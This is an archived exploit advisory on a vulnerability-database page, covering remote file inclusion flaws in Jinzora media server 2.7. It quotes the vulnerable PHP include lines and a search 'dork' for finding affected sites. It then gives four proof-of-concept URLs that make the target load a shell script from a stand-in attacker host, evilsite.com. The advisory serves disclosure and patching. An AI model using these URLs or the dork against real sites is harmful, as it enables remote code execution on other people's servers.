Lucene search
K

Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 16 Views

Jinzora 2.7 Remote File Include Vulnerabilitie

Code

                                                +-------------------------------------------------------------------------------------------
+ Jinzora &#60;= 2.7 (include_path) Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://www.jinzora.com/
+ Affected Software .: Jinzora &#60;= 2.7
+ Download ..........: http://www.jinzora.com/downloads/j2.7.tar.gz
+ Description .......: &#34;Jinzora enables you to stream your digital music and videos to any internet connected computer using a web browser&#34;
+ Dork ..............: &#34;Jinzora Media Jukebox&#34;
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid &#60;nuffsaid[at]newbslove.us&#62;
+-------------------------------------------------------------------------------------------
+ Details:
+ Jinzora has several scripts which do not initialize variables before using them to include
+ files, assuming register_globals = on, we can initialize any one of the variables in a query
+ string and include a remote file of our choice.
+
+ Vulnerable Code:
+ popup.php, line(s) 01-27:
+ -&#62; 01: &#60;?php define(&#39;JZ_SECURE_ACCESS&#39;,&#39;true&#39;);
+ -&#62; 27: include_once(&#39;jzBackend.php&#39;); //jzBackend.php is being included before the include_path var is set
+ jzBackend.php, line(s) 40-77:
+ -&#62; 01: &#60;?php if (!defined(JZ_SECURE_ACCESS)) die (&#39;Security breach detected.&#39;);
+ -&#62; 40: @include($include_path.&#34;settings.php&#34;); //assumes the include_path var has been set
+ -&#62; 77: include($css);
+ rss.php, line(s) 01-35:
+ -&#62; 01: &#60;?php define(&#39;JZ_SECURE_ACCESS&#39;,&#39;true&#39;);
+ -&#62; 35: include_once(&#39;backend/backend.php&#39;);
+ backend/backend.php, line(s) 02-42:
+ -&#62; 02: if (!defined(JZ_SECURE_ACCESS)) die (&#39;Security breach detected.&#39;);
+ -&#62; 42: include_once($include_path. &#39;system.php&#39;); //assumes the include_path var has been set
+ ajax_request.php, line(s) 01-32:
+ -&#62; 01: &#60;?php define(&#39;JZ_SECURE_ACCESS&#39;,&#39;true&#39;);
+ -&#62; 32: require_once(&#39;jzBackend.php&#39;); //see jzBackend.php above for vulnerable code
+ mediabroadcast.php, line(s) 01-42:
+ -&#62; 01: &#60;?php define(&#39;JZ_SECURE_ACCESS&#39;,&#39;true&#39;);
+ -&#62; 42: include_once(&#39;backend/backend.php&#39;); //see above for vulnerable code
+
+ Proof Of Concept:
+ http://[target]/[path]/popup.php?include_path=http://evilsite.com/shell.php?
+ http://[target]/[path]/rss.php?include_path=http://evilsite.com/shell.php?
+ http://[target]/[path]/ajax_request.php?include_path=http://evilsite.com/shell.php?
+ http://[target]/[path]/mediabroadcast.php?include_path=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-25]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation